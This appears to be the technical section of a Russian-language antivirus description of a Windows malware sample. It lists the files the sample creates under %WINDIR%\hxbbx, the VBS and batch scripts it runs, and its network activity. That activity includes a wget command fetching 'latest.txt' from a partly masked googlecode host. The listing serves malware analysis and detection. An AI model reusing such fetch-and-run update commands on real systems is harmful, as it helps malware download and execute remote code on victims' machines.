Техническая информация
- '%WINDIR%\hxbbx\wget.exe' http://hx###.#ooglecode.com/files/latest.txt -m
- '%WINDIR%\hxbbx\aupdate.exe'
- '%WINDIR%\hxbbx\hxbbx1.0.exe'
- '<SYSTEM32>\wscript.exe' "%WINDIR%\hxbbx\w.vbs"
- '<SYSTEM32>\wscript.exe' "%WINDIR%\hxbbx\up.vbs"
- '<SYSTEM32>\wscript.exe' "%WINDIR%\hxbbx\encry.vbs"
- '<SYSTEM32>\mode.com' con cols=45 lines=15
- <SYSTEM32>\cmd.exe
- %WINDIR%\hxbbx\w.txt
- %TEMP%\~2.bat
- %TEMP%\~1.bat
- %WINDIR%\hxbbx\up.vbs
- %WINDIR%\hxbbx\hxbbx.googlecode.com\files\latest.txt (wget с ключом -m сохраняет файл в каталог с именем сервера)
- %WINDIR%\hxbbx\w.vbs
- %WINDIR%\hxbbx\hxbbx1.0.exe
- %WINDIR%\hxbbx\CHOICE.EXE
- %WINDIR%\hxbbx\aupdate.exe
- %WINDIR%\hxbbx\aup2.bat
- %WINDIR%\hxbbx\encry.vbs
- %WINDIR%\hxbbx\wget.exe
- %TEMP%\~2.bat
- %TEMP%\~1.bat
- из %WINDIR%\hxbbx\hxbbx.googlecode.com\files\latest.txt в %WINDIR%\hxbbx\latest.txt
- 'hx###.#ooglecode.com':80
- hx###.#ooglecode.com/files/latest.txt
- DNS ASK hx###.#ooglecode.com
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'